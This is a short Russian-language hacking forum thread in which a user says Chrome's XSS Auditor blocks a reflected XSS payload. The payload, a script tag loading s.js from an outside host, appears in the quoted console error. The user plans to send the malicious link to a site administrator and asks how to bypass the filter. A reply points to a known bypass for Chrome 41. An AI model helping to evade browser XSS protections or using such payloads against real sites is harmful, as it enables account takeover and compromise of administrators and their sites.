Хром блокирует XSS

Discussion in 'Песочница' started by ShpillyWilly, 2 Dec 2015.

  1. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    71
    Likes Received:
    4
    Reputations:
    0
    Хром блокирует исполнение XSS, в Firefox все ок, как можно это побороть, подскажите.

    The XSS Auditor refused to execute a script in 'http://*****/lib/index.php/"><script src=http://******/s.js></script>' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header.


    мне же админу эту ссылку засылать, а если у него вдруг хром?!)
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    ну, такие дела. для 41 версии есть байпасс, искать в гугле
    /threads/426123/
     
    _________________________